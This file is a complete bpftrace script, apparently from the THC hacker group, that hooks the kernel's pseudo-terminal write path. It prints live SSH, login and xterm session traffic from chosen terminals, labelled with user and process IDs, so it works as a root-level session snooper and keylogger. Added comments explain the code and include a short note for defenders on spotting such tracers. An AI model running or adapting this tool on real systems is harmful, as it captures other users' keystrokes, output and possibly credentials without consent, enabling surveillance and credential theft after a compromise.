ptysnoop.bt
#! /usr/bin/env bpftrace
/*
* bpftrace -B none ./ptysnoop.bt [PTY number]...
*
* Example 1 - Snoop on sshd, login and xterms:
* BPFTRACE_STRLEN=200 bpftrace -Bnone ./ptysnoop.bt
*
* Example 2 - Snoop on /dev/pty/0, ... /dev/pty/3:
* bpftrace -Bnone ./ptysnoop.bt 0 1 2 3
*
* FAQ:
* 1. Download the latest bpftrace static binary for Linux:
* curl -o bpftrace -fL https://github.com/iovisor/bpftrace/releases/latest/download/bpftrace
*
* Limitations:
* - The buffer may contain \x0d in the middle and it won't translate to \n.
*/
/*
 * BEGIN: choose the operating mode from the positional parameters and
 * initialise the global maps used by the kfunc:pty_write probe.
 *
 * Two modes exist:
 *   - no PTY numbers given: match by process name (sshd / *term* / login),
 *     @is_tty_snoop stays 0 (unset maps read as 0 in bpftrace);
 *   - one or more PTY numbers given: @is_tty_snoop = 1 and only the listed
 *     /dev/pts indexes are traced (recorded as keys of @all_tty).
 *
 * 31336 is a magic first argument: it suppresses the "nicefy" tip below and,
 * when it is the only argument, keeps the script in process-name mode. It is
 * the value the tip itself tells the user to pass when piping through sed.
 *
 * Defender's note: loading this requires root (CAP_BPF/CAP_PERFMON); the
 * resulting fentry program on pty_write is visible to `bpftool prog list`,
 * which is the practical way to spot this kind of tracer on a host.
 */
BEGIN
{
// 0x0d (CR) is the "we are at the start of a line" marker for the probe's
// output formatting; start as if a fresh line had just begun.
@last_special = 0x0d;
if ($1 != 31336) {
printf("🦋 \x1b[0;33mTIP: Nicefy the output:\n");
printf("\x1b[0;36mbpftrace -Bnone ptysnoop.bt 31336 | sed -Eu -e 's/\\\\x0a\\\\x0d|\\\\x0d/\\n| /g' -e 's/\\\\x1b\\[[0-9;><]*[a-zA-Z~]|\\\\x1bO[ABCD]//g' -e 's/(\\\\x[0-9a-f]{2})+//g' -e 's/(\\\\[dt])+/\\1/g'\x1b[0m\n");
printf("-----\n");
}
// No arguments at all: process-name mode, nothing more to set up.
if ($# == 0) { return; }
// Only the magic value: same as no arguments (the tip was just not printed).
if ($# == 1 && $1 == 31336) { return; }
// Explicit PTY-list mode from here on.
@is_tty_snoop = 1;
// bpftrace has no way to iterate positional parameters, hence one line per
// slot. At most 12 PTY numbers are honoured; $13 and beyond are silently
// ignored. $1 is skipped when it is the magic value.
if ($# >= 1 && $1 != 31336) { @all_tty[$1] = 1; }
if ($# >= 2) { @all_tty[$2] = 1; }
if ($# >= 3) { @all_tty[$3] = 1; }
if ($# >= 4) { @all_tty[$4] = 1; }
if ($# >= 5) { @all_tty[$5] = 1; }
if ($# >= 6) { @all_tty[$6] = 1; }
if ($# >= 7) { @all_tty[$7] = 1; }
if ($# >= 8) { @all_tty[$8] = 1; }
if ($# >= 9) { @all_tty[$9] = 1; }
if ($# >= 10) { @all_tty[$10] = 1; }
if ($# >= 11) { @all_tty[$11] = 1; }
if ($# >= 12) { @all_tty[$12] = 1; }
}
/*
 * END: runs when bpftrace exits (e.g. on Ctrl-C). Prints the log clean-up
 * hint (unless the 31336 magic argument was given), resets terminal colours,
 * prints the project banner and drops every map so bpftrace does not dump
 * their contents on exit.
 */
END
{
if ($1 != 31336) {
printf("\n😘 \x1b[0;33mYou may want to nicefy a log like so:\n");
printf("\x1b[0;36mcat x.log | sed -E -e 's/\\\\x0a\\\\x0d|\\\\x0d/\\n| /g' -e 's/\\x1b\\[[0-9;]*m|\\\\x1b\\[[0-9;><]*[a-zA-Z~]|\\\\x1bO[ABCD]//g' -e 's/(\\\\x[0-9a-f]{2})+//g' -e 's/(\\\\[dt])+/\\1/g'");
}
// "\x1b[0m" ends whatever colour the probe left active before the banner.
printf("\x1b[0m\n-----\n\x1b[1;37mJoin us on Telegram - https://t.me/thcorg\x1b[0m");
// Explicitly delete/clear all maps: bpftrace prints any map still populated
// at exit, which would append raw state to the captured output.
delete(@last_special);
delete(@last_id);
delete(@is_tty_snoop);
delete(@color);
clear(@all_tty);
}
/*
 * kfunc:pty_write — fires on every write to a pseudo-terminal (needs a
 * kernel with BTF for kfunc probes). args->buf / args->c are the bytes and
 * byte count handed to the kernel's pty_write(); everything that reaches the
 * selected PTYs — i.e. the terminal traffic of those sessions — is printed
 * raw, so the output of this script is as sensitive as the sessions it
 * watches and must be handled (and its presence on a host treated) as such.
 *
 * Output format: a coloured ">>>> comm pid /dev/pty/N (uid=U):" header each
 * time the tty changes, then lines prefixed with "| ". Backspace/DEL and TAB
 * are rendered as "\d" and "\t", CR starts a new line, other single control
 * bytes are suppressed (see @last_special handling).
 *
 * Global state shared across invocations:
 *   @last_id      tty_struct pointer of the previous write (0 before first)
 *   @last_special last single control byte printed, 0x0d = at line start,
 *                 -1 = printable data was the last thing printed
 *   @color        ANSI colour index (1..6) derived from the pty index
 *   @all_tty      allow-list of pty indexes in explicit-list mode
 */
kfunc:pty_write
/args->tty->count == 1/ // only master TTY
{
if (@is_tty_snoop > 0) {
// Explicit-list mode: absent keys read as 0, so unlisted PTYs are skipped.
if (@all_tty[args->tty->index] == 0) { return; }
} else {
// Process-name mode: sshd, anything containing "term" (xterm, gnome-terminal,
// ...) and login. comm is the 16-byte kernel task name, not the full path.
// NOTE(review): $hit is first assigned only inside the preceding `if`;
// whether the `$hit == 0` tests below see 0 for other processes depends on
// bpftrace's scratch-variable scoping rules — confirm on the target version.
if (comm == "sshd") { $hit = 1; }
if ($hit == 0 && strcontains(comm, "term") == 1) { $hit = 1; }
if ($hit == 0 && comm == "login") { $hit = 1; }
if ($hit == 0) { return; }
}
$b = args->buf;
$len = args->c;
$last_id = @last_id;
// Sessions are distinguished by the tty_struct address, not by PID.
$this_id = (uint64)args->tty;
// Do not output Arrow-UP/DOWN
// (in practice any 3-byte write starting with ESC — e.g. ESC [ A — is dropped,
// which also covers the other cursor keys)
if ($len == 3 && $b[0] == 0x1b) { return; }
$special = -1;
if ($len == 1) {
// Special character. Only output ONCE
// A single byte outside printable ASCII (0x20..0x7e) is treated as a control
// byte; its value is kept in $special, otherwise $special stays -1.
if ($b[0] < 0x20 || $b[0] > 0x7e) {
$special = $b[0];
}
}
if ($last_id != $this_id) {
// The tty has changed since the last write (original comment said "PID";
// the key is the tty pointer set below).
// Don't output if the user just presses enter or other special single input.
if ($special >= 0) { return; }
// Go to new line unless we are already on a new line.
if (@last_special != 0x0d) { printf("\n"); }
// 1..6 -> ANSI foreground colours 31..36 via the "\x1b[0;3%dm" format.
@color = (uint64)args->tty->index % 6 + 1;
printf("\x1b[0m>>>> \x1b[0;33m%s\x1b[0m %d /dev/pty/%d (uid=%d):\n\x1b[0;3%dm", comm, pid, args->tty->index, uid, @color);
// Record a successful switch to new prompt
@last_id = $this_id;
@last_special = 0x0d;
}
if ($special >= 0) {
// Only output special characters ONCE.
if (@last_special == $special) { return; }
// Never output if at the beginning of a new line
if (@last_special == 0x0d) { return; }
// Control bytes other than BS/DEL, TAB and CR (e.g. a lone LF or ESC) are
// recorded in @last_special but print nothing.
if ($special == 0x08 || $special == 0x7f) {
printf("\x1b[0;2m\\d\x1b[0;3%dm", @color); // DEL
} else if ($special == 0x09) {
printf("\x1b[0;2m\\t\x1b[0;3%dm", @color); // TAB
} else if ($special == 0x0d) {
printf("\n");
}
@last_special = $special;
return;
}
// Printable (or multi-byte) data: prefix "| " when starting a fresh line.
if (@last_special == 0x0d) { printf("| "); }
@last_special = -1;
// %r prints the buffer with non-printables escaped as \xNN. The captured
// length is presumably capped by BPFTRACE_STRLEN (the header example sets it
// to 200) — longer writes would be truncated; verify on the target version.
printf("%r", buf($b, $len));
}